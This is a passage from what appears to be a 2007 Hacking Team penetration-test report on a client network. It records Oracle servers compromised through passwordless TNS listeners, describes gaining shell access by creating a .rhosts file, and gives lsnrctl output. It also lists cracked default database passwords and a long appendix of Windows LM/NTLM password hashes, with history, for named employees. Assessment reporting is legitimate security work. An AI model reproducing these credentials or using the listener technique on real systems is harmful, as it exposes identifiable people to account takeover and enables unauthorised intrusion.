LOGSTDBY_ADMINISTRATOR
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
GLOBAL_AQ_USER_ROLE GLOBAL
OEM_MONITOR
DBSNMP E066D214D5421CCC
HS_ADMIN_ROLE
ATSADMIN AB0C333373FA275B
NAME PASSWORD
------------------------------ ------------------------------
MTSNET 9C1D08286EECF58A
MARKETVIEW F3AF6468FC5D3DF7
MARKET 7ADF0631FA3113BA
OTC B0EB5E87D4A733F6
OOWAUSER_ROLE
JAVAUSERPRIV
JAVAIDPRIV
JAVASYSPRIV
JAVADEBUGPRIV
EJBCLIENT
JAVA_ADMIN
NAME PASSWORD
------------------------------ ------------------------------
JAVA_DEPLOY
SALES_HISTORY_ROLE
_NEXT_USER
PERFSTAT AC98877DE1297365
ATSSDP 67A6FCE962536631
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 388 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
ATSCMF FF4FE502854CCFD4
ATSSWAP 3C927CD87FABBD19
ADMIN 9F919C566CC0BBC9
APPS D728438E8A5925E0
42 rows selected.
SQL> SPOOL OFF;exit
It was possible to crack most of the authentication hashes:
Hashed Clear text
SYS:B3FDF88DC629C79B
SYSTEM:AD47C8AA621F0072
OUTLN:4A3BA55E08595C81
GLOBAL_AQ_USER_ROLE:GLOBAL
DBSNMP:E066D214D5421CCC
ATSADMIN:AB0C333373FA275B
MTSNET:9C1D08286EECF58A
MARKETVIEW:F3AF6468FC5D3DF7
MARKET:7ADF0631FA3113BA
OTC:B0EB5E87D4A733F6
PERFSTAT:AC98877DE1297365
ATSSDP:67A6FCE962536631
ATSCMF:FF4FE502854CCFD4
ATSSWAP:3C927CD87FABBD19
ADMIN:9F919C566CC0BBC9
APPS:D728438E8A5925E0
OUTLN:OUTLN
ATSSDP:ATSSDP
MARKET:MARKET
MTSNET:MTSNET
ATSADMIN:ATSADMIN
PERFSTAT:PERFSTAT
OTC:OTC
APPS:APPS
DBSNMP:DBSNMP
MARKETVIEW:MARKETVIEW
GLOBAL:GLOBAL_AQ_USER_ROLE
7.1.7 100.100.245.142 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V5, V7, V10
Risk state: high
Skill level required to exploit the vulnerability: Medium
Solution: Change all default passwords; update Oracle to the last version available or at least install all
required patches; enable security in TNS listener; encrypt sensitive data files
Discovery method Network scan
Availability Startup on boot
Class Application/Service
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 389 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Vendor/OS Oracle Version 10.2.0.1.0
Compromised Compromised Directly Info TSN Listened with no pass.
Auth Not needed
The database server is accessible by any host in the network. No firewall ACL is present.
It's possible to fetch the complete Oracle status by queryng the TNS Listener.
Passwordless TNS Listener allow arbitrary file creation with the privileges of the user running the
Oracle database by altering the log path. Local access to the user rurring Oracle can be gained by
creating a .rhost file:
LSNRCTL> set current_listener 192.168.254.142
Current Listener is 192.168.254.142
LSNRCTL> version
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.142))(ADDRESS=(PROTO
COL=TCP)(HOST=192.168.254.142)(PORT=1521)))
TNSLSNR for Solaris: Version 10.2.0.1.0 - Production
TNS for Solaris: Version 10.2.0.1.0 - Production
Unix Domain Socket IPC NT Protocol Adaptor for Solaris: Version
10.2.0.1.0 - Production
Oracle Bequeath NT Protocol Adapter for Solaris: Version 10.2.0.1.0 -
Production
TCP/IP NT Protocol Adapter for Solaris: Version 10.2.0.1.0 -
Production,,
The command completed successfully
7.1.8 100.100.245.230 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V5, V7, V10
Risk state: high
Skill level required to exploit the vulnerability: Medium
Solution: Change all default passwords; update Oracle to the last version available or at least install all
required patches; enable security in TNS listener; encrypt sensitive data files
Discovery method Network scan
Availability Startup on boot
Class Application/Service
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 390 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Vendor/OS Oracle Version 8.1.7.2.0
Compromised Compromised Directly Info TSN Listened with no pass.
Auth Not needed
The database server is accessible by any host in the network. No firewall ACL is present.
It's possible to fetch the complete Oracle status by queryng the TNS Listener.
Passwordless TNS Listener allow arbitrary file creation with the privileges of the user running the
Oracle database by altering the log path. Local access to the user rurring Oracle can be gained by
creating a .rhost file:
Current Listener is 192.168.254.230
LSNRCTL> version
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.230))(ADDRESS=(PROTO
COL=TCP)(HOST=192.168.254.230)(PORT=1521)))
TNSLSNR for Solaris: Version 8.1.7.2.0 - Production
TNS for Solaris: Version 8.1.7.2.0 - Production
Oracle Bequeath NT Protocol Adapter for Solaris: Version 8.1.7.2.0 -
Production
Unix Domain Socket IPC NT Protocol Adaptor for Solaris: Version
8.1.7.2.0 - Production
TCP/IP NT Protocol Adapter for Solaris: Version 8.1.7.2.0 - Production,,
The command completed successfully
LSNRCTL> services
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.230))(ADDRESS=(PROTO
COL=TCP)(HOST=192.168.254.230)(PORT=1521)))
Services Summary...
Service "DEVL" has 1 instance(s).
Instance "DEVL", status READY, has 1 handler(s) for this service...
Handler(s):
"DEDICATED" established:1 refused:0 state:ready
LOCAL SERVER
Service "ORCL" has 1 instance(s).
Instance "ORCL", status READY, has 2 handler(s) for this service...
Handler(s):
"DEDICATED" established:4077801 refused:6592 state:ready© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 391 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
LOCAL SERVER
"DEDICATED" established:0 refused:0 state:ready
LOCAL SERVER
Service "ORCLA" has 1 instance(s).
Instance "ORCLA", status READY, has 1 handler(s) for this service...
Handler(s):
"DEDICATED" established:0 refused:0 state:ready
LOCAL SERVER
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status READY, has 1 handler(s) for this service...
Handler(s):
"DEDICATED" established:1 refused:0 state:ready
LOCAL SERVER
The command completed successfully
LSNRCTL> status
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.230))(ADDRESS=(PROTO
COL=TCP)(HOST=192.168.254.230)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias LISTENER
Version TNSLSNR for Solaris: Version 8.1.7.2.0 - Production
Start Date 29-NOV-2006 15:44:18
Uptime 277 days 4 hr. 23 min. 19 sec
Trace Level off
Security OFF
SNMP OFF
Listener Parameter File /opt/oracle/OraHome1/network/admin/listener.ora
Listener Log File /opt/oracle/OraHome1/network/log/listener.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=milbvalpha)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=milbvalpha)(PORT=2481))(PROTOCOL_STA
CK=(PRESENTATION=GIOP)(SESSION=RAW)))
Services Summary...
Service "DEVL" has 1 instance(s).
Instance "DEVL", status READY, has 1 handler(s) for this service...
Service "ORCL" has 1 instance(s).
Instance "ORCL", status READY, has 2 handler(s) for this service...
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 392 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Service "ORCLA" has 1 instance(s).
Instance "ORCLA", status READY, has 1 handler(s) for this service...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status READY, has 1 handler(s) for this service...
The command completed successfully
7.1.9 100.100.245.6 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Network scan
Availability Startup on boot
Class Application/Service
Vendor/OS Oracle Version
Compromised No Info Not detected
Auth Not detected
It was not possible to get access on the Oracle database:
LSNRCTL> set current_listener 192.168.254.6
Current Listener is 192.168.254.6
LSNRCTL> version
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.6))(ADDRESS=(PROTOCO
L=TCP)(HOST=192.168.254.6)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
LSNRCTL> services
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.6))(ADDRESS=(PROTOCO
L=TCP)(HOST=192.168.254.6)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 393 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Solaris Error: 146: Connection refused
LSNRCTL> status
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.6))(ADDRESS=(PROTOCO
L=TCP)(HOST=192.168.254.6)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
7.1.10 100.100.245.8 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Network scan
Availability Startup on boot
Class Application/Service
Vendor/OS Oracle Version
Compromised No Info Not detected
Auth Not detected
It was not possible to get access on the Oracle database:
LSNRCTL> set current_listener 192.168.254.8
Current Listener is 192.168.254.8
LSNRCTL> version
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.8))(ADDRESS=(PROTOCO
L=TCP)(HOST=192.168.254.8)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
LSNRCTL> services
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 394 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.8))(ADDRESS=(PROTOCO
L=TCP)(HOST=192.168.254.8)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
LSNRCTL> status
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.8))(ADDRESS=(PROTOCO
L=TCP)(HOST=192.168.254.8)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
7.1.11 100.100.245.10 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Network scan
Availability Startup on boot
Class Application/Service
Vendor/OS Oracle Version
Compromised No Info Not detected
Auth Not detected
It was not possible to get access on the Oracle database:
LSNRCTL> set current_listener 192.168.254.10
Current Listener is 192.168.254.10
LSNRCTL> version
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 395 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.10))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.10)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
LSNRCTL> services
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.10))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.10)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
LSNRCTL>
LSNRCTL> status
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.10))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.10)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 396 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
8 Appendix A
Here is the full dump of 3588 Microsoft Windows hashes extracted from the 100.100.100.24/25/27/29/30
domain controller:
MNapoletano:1118:A76821CD2E8F6F829C5014AE4718A7EE:16105D3FF89B954BA510271D014739E7:::
MNapoletano_history_0:1118:A6D520AFF2FFC0199C5014AE4718A7EE:1D8FA8EAA3052BB3798D460AA94AB369:::
MNapoletano_history_1:1118:06D98415EB7102D29C5014AE4718A7EE:BF5DF0A8DC73A3D81996D4A800AB6236:::
MNapoletano_history_2:1118:FB6CECB483D922499C5014AE4718A7EE:D7DC44F5C7535362B552F488E90FCE1B:::
MNapoletano_history_3:1118:B991CA925ABD9EF2058B289431BC7466:73F19A4FAB48E8EDE459BC3300567C16:::
MNapoletano_history_4:1118:DB07A2FD2D6A2C2B058B289431BC7466:CF66FC28710F6BE79BF1E63CA9318636:::
MNapoletano_history_5:1118:B991CA925ABD9EF295B909E7668E47E6:99D729D1E9A10F0125CCD6FEB87E59FF:::
MNapoletano_history_6:1118:57DBE86E53BA795A1D71060D896B7A46:90233FD1256E0224672B7407775F33A6:::
MNapoletano_history_7:1118:2485812D28D8A82C1D71060D896B7A46:EE6590A4C918E4CD83DFE8C2129B524A:::
MNapoletano_history_8:1118:13360697B5A8A0C97C3113B4A1A5E3A0:C6F2FE5A4CA95861D630F18184F521A9:::
MNapoletano_history_9:1118:9EB8F80195F4D73A7C3113B4A1A5E3A0:F82DA00D036B2F32C2C425F0A0A07A29:::
MNapoletano_history_10:1118:749E5DE9DE92E5271D71060D896B7A46:C238E478C408B71BEBD44A0ADEF533E3:::
MTSCluster:1119:BAD46F99BA178C94E72C57EF50F76A05:9FEC52907E16A15AB68EB3A08BF771A0:::
MIL_Backup:1121:4BF995B8D94422045D9F023EE01D442B:0F3A8AF2953D77C84D66D80670F0C487:::
MIL_Backup_history_0:1121:AC804745EE68EBEA1AA818381E4E281B:E45A314C664D40A227F9540121D1A29D:::
ROM_Backup:1122:17BD0802D0C77BE22DBCEF9ACD420D6A:CCA2E968602388E472AEA0DCAF61EBF5:::
ROM_Backup_history_0:1122:BAD46F99BA178C94E72C57EF50F76A05:9FEC52907E16A15AB68EB3A08BF771A0:::
LON_Backup:1123:A6772F9B0320EBD8E775DCEA4C6B5F23:01FE5B28300B45FDF9F359A2CD930CDA:::
LON_Backup_history_0:1123:9B58CDA1A4D53BD5C2265B23734E0DAC:9851AF176458BB24057A50031A43A2F2:::
LON_Backup_history_1:1123:A6772F9B0320EBD8E775DCEA4C6B5F23:01FE5B28300B45FDF9F359A2CD930CDA:::
LON_Backup_history_2:1123:BAD46F99BA178C94E72C57EF50F76A05:9FEC52907E16A15AB68EB3A08BF771A0:::
JBeenders:1126:40476CA2FD24A232FF928058B4CAC2C2:4C4C2B82820145D07B7B043620E94AED:::
JBeenders_history_0:1126:3FF91B60D5BF49389BA17E4369A8BC0D:44BE9335C1E0746CA6A4A837D5E6DF87:::
JBeenders_history_1:1126:B330817617ADBA8B420698125EA74B7D:5DC3548013FC7DFC8B32F8F7B918A9D4:::
JBeenders_history_2:1126:C9538AF7336DC8EC884259D570ACB17D:D756F639F5DF6D1DBC783A487E4577E7:::
JBeenders_history_3:1126:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
JBeenders_history_4:1126:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
SBhular:1127:74E7A2C306AD20DDDA15B0B303C92FD1:EA19B0838C0D0BB6C89C5A7D115C4064:::
SBhular_history_0:1127:8EA74F4013A4D3B6DFB87F07E7BCDA1E:4ECC1919BF383C1AA6A435256A9F4B53:::
SBhular_history_1:1127:8EA74F4013A4D3B6417EAF50CFAC29C3:7487D4F52BF562A222CC09D3DDD5C0E4:::
SBhular_history_2:1127:74E7A2C306AD20DDDA15B0B303C92FD1:EA19B0838C0D0BB6C89C5A7D115C4064:::
SBhular_history_3:1127:E745DBA42A495FD9D2E3C19D6AF9DACC:84BBC3857EC408E6E418EA0E8B41A349:::
SBhular_history_4:1127:74E7A2C306AD20DDDA15B0B303C92FD1:EA19B0838C0D0BB6C89C5A7D115C4064:::
SBhular_history_5:1127:74E7A2C306AD20DDDA15B0B303C92FD1:EA19B0838C0D0BB6C89C5A7D115C4064:::
SBhular_history_6:1127:36252164D6F8CB6CDACF467F5234E260:32785D126097870C08932C159C8EC674:::
SBhular_history_7:1127:480E793DC4C276C0C0F8B399D187ECF3:C69FD68DDD5B4584CD54AF63783EE6EA:::
SBhular_history_8:1127:NO PASSWORD*********************:E36964DF01F3C2C89B98F06FAE1542ED:::
SBhular_history_9:1127:8E020DCD38CA3D9297BD178E117F9F37:24B6BBE7A8A1F0A8F8EF199F28D1F051:::
SBhular_history_10:1127:31AD98E34C89C5058DEC69DD19EE7B7C:2F366CDBD3CB4F8094692A7316502312:::
ECaloia:1128:367609D22010C2E3C81667E9D738C5D9:D63649BFA654987C6A44C57AF2911804:::
ECaloia_history_0:1128:367609D22010C2E39C5014AE4718A7EE:DD168176BC9D462032F1A3D87FF32FD3:::
ECaloia_history_1:1128:367609D22010C2E3FF17365FAF1FFE89:9B63592D067E096A731FF5E52B414E3B:::
ECaloia_history_2:1128:367609D22010C2E31AA818381E4E281B:D2348FF4BC068FFAEEE545A8000E7BD3:::
ECaloia_history_3:1128:367609D22010C2E31D71060D896B7A46:9CE3EF55C0534649082F2B6B9F9A43D1:::
ECaloia_history_4:1128:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
ECaloia_history_5:1128:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
ECaloia_history_6:1128:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
ECaloia_history_7:1128:264674F048C14CC625AD3B83FA6627C7:A4F93B3C917214AFC34BD8662E38F342:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 397 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
ECaloia_history_8:1128:264674F048C14CC625AD3B83FA6627C7:A4F93B3C917214AFC34BD8662E38F342:::
ECaloia_history_9:1128:6C4A64AE8C7383B025AD3B83FA6627C7:860C54D0079C91A66706B02442FCA456:::
ECaloia_history_10:1128:6C4A64AE8C7383B025AD3B83FA6627C7:860C54D0079C91A66706B02442FCA456:::
OClark:1129:NO PASSWORD*********************:811CDB1BC3CD1CF4AB77D2F374BA135D:::
OClark_history_0:1129:NO PASSWORD*********************:57623278756E17248A70D2DA213CB5A0:::
OClark_history_1:1129:F88B88FEEDF06D7AF078B41FC11FDE36:19318636D51B8D47351F5F129E7F6966:::
OClark_history_2:1129:E52CAC67419A9A22664345140A852F61:58A478135A93AC3BF058A5EA0E8FDB71:::
OClark_history_3:1129:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
OClark_history_4:1129:47AA025B3BEEE172CCF9155E3E7DB453:C125E8AE7F46D154EFF7129B98DEA961:::
OClark_history_5:1129:0AD59D66904DB351FAD0AB933C7D7C12:0900449BD69C3D8FFCEA0F5E0F93A02D:::
OClark_history_6:1129:C8110068601A8A2DB75E0C8D76954A50:E861C299D1ED2A082F21E354AC2472FD:::
OClark_history_7:1129:0AD59D66904DB35188113502ADE9355A:789B8183E7A18F90E580719F4DC0D2A7:::
OClark_history_8:1129:47AA025B3BEEE172C2265B23734E0DAC:394513D263E10A9454766223097AB0AC:::
OClark_history_9:1129:A087A00925536EE9C2265B23734E0DAC:7A66AA0B0BC2413798568C66144AB5D1:::
OClark_history_10:1129:0AD59D66904DB35188113502ADE9355A:789B8183E7A18F90E580719F4DC0D2A7:::
BCooper:1130:5722C42F74AB0C4A09752A3293831D17:FF90CD715A03A5E1C47F8BB06F7276CC:::
BCooper_history_0:1130:2B02E03A31FAE1EC1A372390EC245634:CBB182997ABD0542A0404A9D80585BB0:::
BCooper_history_1:1130:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
BCooper_history_2:1130:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
TDiGrazia:1132:689253C02952F703F04B4A1A2263C4F6:2A6CA5FC5B33EF294B0D9CD3B5EE7AD1:::
TDiGrazia_history_0:1132:689253C02952F703158759F68C114883:A579FADC3EC448BE36B188A90EBEFB4F:::
TDiGrazia_history_1:1132:689253C02952F703D09D6A8554A873B0:636A733CEA9F9EF673697FADF6ADD773:::
TDiGrazia_history_2:1132:367609D22010C2E3CCF9155E3E7DB453:655731C17C6FC325B0656EA688730C63:::
TDiGrazia_history_3:1132:689253C02952F703D09D6A8554A873B0:636A733CEA9F9EF673697FADF6ADD773:::
TDiGrazia_history_4:1132:689253C02952F70388206D79311F09A8:41494574FCFF57BA210C4224C14EB7EE:::
TDiGrazia_history_5:1132:689253C02952F70309752A3293831D17:82A909917DDB6CB32396D562FF9F7DEC:::
TDiGrazia_history_6:1132:689253C02952F70336077A718CCDF409:8340FBB1B87F4BB956ABFFCCE86DA120:::
TDiGrazia_history_7:1132:689253C02952F7037C3113B4A1A5E3A0:B08AB1BE5D0BD9B542CC498C713583EB:::
TDiGrazia_history_8:1132:689253C02952F703C81667E9D738C5D9:6CD78088D59BFB27F8E4D555AE765FCB:::
TDiGrazia_history_9:1132:689253C02952F7039C5014AE4718A7EE:B7806C2A76EE8B376C271F099884FF00:::
TDiGrazia_history_10:1132:689253C02952F703FF17365FAF1FFE89:42516D4204380BF3F3D0B1E04663D8A7:::
GGalassi:1134:A0C1BCB74B1BCEDEA3D770F369C0ECE6:E63E5F4478CDD57125BEBB71BB37060E:::
GGalassi_history_0:1134:A0C1BCB74B1BCEDE294AF0A217BB89FE:44DD2A6E814222780155729C2C884D49:::
GGalassi_history_1:1134:795A1CA4ED2AEE60F1D054978F7A8AFF:435023669E9CF3BDD4E0C224BA443C48:::
GGalassi_history_2:1134:795A1CA4ED2AEE60DE51656863EEC229:F5D04A3643B862E8D8367348294A13F7:::
GGalassi_history_3:1134:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
GGalassi_history_4:1134:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
GGalassi_history_5:1134:A0C1BCB74B1BCEDEF70CD323AA17C70C:A1F23EDB8CD3116E33D92217CAE4AAB5:::
GGalassi_history_6:1134:A0C1BCB74B1BCEDEC724B25C0E1E501A:0591454F5BE1FEC1DEC643560D6A9C54:::
GGalassi_history_7:1134:A0C1BCB74B1BCEDE38A73CC887756A22:FCAD4282866AC5C0A700F9E69A9C6C10:::
GGalassi_history_8:1134:A0C1BCB74B1BCEDEC71289FEE487F692:FB72B7BDB4718EF0C8E732393D191FC2:::
GGalassi_history_9:1134:A0C1BCB74B1BCEDED6E5B56082414392:674420B79660307AE6B6768D00622122:::
GGalassi_history_10:1134:A0C1BCB74B1BCEDEE2E9F023858EB3AC:614EB612876BE19346624AF8B791FF86:::
GGarbi:1135:888389342D409E0B7A01665EB2EB6C14:B5F457D10903E52EDEC0BF446E765AE5:::
GGarbi_history_0:1135:0297510153F860E07A01665EB2EB6C14:BD30CFBC4A4D8066BEF73DE14F66912C:::
GGarbi_history_1:1135:2804A835FF9C7F59E7D403AAFB5E00F6:275D2AEAFD5112320815A75CFFD35004:::
GGarbi_history_2:1135:E8F67787AEEAD3851170E0A48692C806:CBC534C770CC23535A9712BD272AE68A:::
GGarbi_history_3:1135:08BEFE6FEACDDBABB3A23F4730883E44:3C04A1BB7043E66FDE4EC037B7AE4102:::
GGarbi_history_4:1135:EED26EF6039F03186C56AD1273B005AE:4B843CE8A2470B6F094678470EBA6562:::
GGarbi_history_5:1135:791EB77E325095D06C56AD1273B005AE:4B24C37E4904A04D66028B3FA9B6CAAC:::
GGarbi_history_6:1135:7A2DDDC893EB14596C56AD1273B005AE:0C57B3BA39C3EE066ED2C3DE8280CC2D:::
GGarbi_history_7:1135:BCE7D4A7E0F32596B3A23F4730883E44:0CE6CD62EA3EF4AE1403FF2102955128:::
GGarbi_history_8:1135:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
GGarbi_history_9:1135:E9501DEB6B55E6F50E3E8C7091784A6B:560C4F14A5C7E09CCC1D53E46C81699E:::
GGarbi_history_10:1135:DB21E46FA73DBD078A16226D1236B935:1160F79F1998A4D8A89AE06E336A0F89:::
JGeorge:1136:7453F3F6BD528AF488206D79311F09A8:8C92698543B185A6FD56C96C992EE704:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 398 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
JGeorge_history_0:1136:62745E5E3C43091B73251AA2B4314B90:0A408811E408E7911C26F3BEE645A0AE:::
JGeorge_history_1:1136:13CD14AB04B919CFC2265B23734E0DAC:92950D10BB89BDA6389022EAFA04AF17:::
JGeorge_history_2:1136:13CD14AB04B919CFC2265B23734E0DAC:92950D10BB89BDA6389022EAFA04AF17:::
JGeorge_history_3:1136:961D66583685D17D6E8F82769BF01BBF:4F0C6F2EAFE91AA18047666B056A195E:::
JGeorge_history_4:1136:E49CF8C89DE22637152D28820D5993D6:CF24B6C89F8F9A6F0E4D015832E9E9CF:::
JGeorge_history_5:1136:E49CF8C89DE226373803B81C9E645358:30C56A961F670215181FED007C37750E:::
JGeorge_history_6:1136:24B4E390FFBAAA3377F4B1C37C2AAA77:0D09E1E4C1984F0EF4CEB41D8B6548C2:::
JGeorge_history_7:1136:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
JGeorge_history_8:1136:E49CF8C89DE2263707EFA6E4F9F897E3:54536DA6843B841F99AB2BDAA74607FB:::
JGeorge_history_9:1136:24B4E390FFBAAA334845E7610D730F75:460BC15B46E5BB1F8DE5ECF3B58D4393:::
JGeorge_history_10:1136:24B4E390FFBAAA33C85F9F93714E6C8E:AFC71E98DCDCD7E792DB1F3AC51813B1:::
THeath:1137:DA83C92543787C9536077A718CCDF409:FBC54BD228D16E0DE167193ADFB3B577:::
THeath_history_0:1137:B444ED24F2EED8E009752A3293831D17:278F3FB43588B219F2FF41B3D0A3DA2B:::
THeath_history_1:1137:E42F27E346E8146625AD3B83FA6627C7:E1DE7F62251CBA4C7472E89C0F99BCDA:::
THeath_history_2:1137:13CD14AB04B919CFB75E0C8D76954A50:D53444B630132B78766AF60F1F0D9549:::
THeath_history_3:1137:1AE00DCC6B65CCA2C81667E9D738C5D9:8C4B04230B42F9F6C8762D6DE7FDF973:::
THeath_history_4:1137:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
THeath_history_5:1137:CCC89DED1CCF693F9C5014AE4718A7EE:6A0929C9836187AFB5A605B320E31644:::
THeath_history_6:1137:ABBEDFDF9119C812FF17365FAF1FFE89:E4C765996D845B8F0161D1D3BB5F2E97:::
THeath_history_7:1137:401FFD6DC2B55CDCC2265B23734E0DAC:A6407E0D03DCDFBFC1B9B155E0D7EA90:::
THeath_history_8:1137:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
THeath_history_9:1137:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
THeath_history_10:1137:E12D0234222E2C1D1AA818381E4E281B:AB9276D1C19BE43C704F7F8915CF0366:::
PKanani:1138:52A1156290CEDAEAD6B9F9C8CCAF621E:BD199825D7B4D8D6842B5CF21BD40660:::
PKanani_history_0:1138:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
PKanani_history_1:1138:F2CA47B15A919D25065B0861F67360B6:60105FFDC33B9C87B55F91D27B2F53F4:::
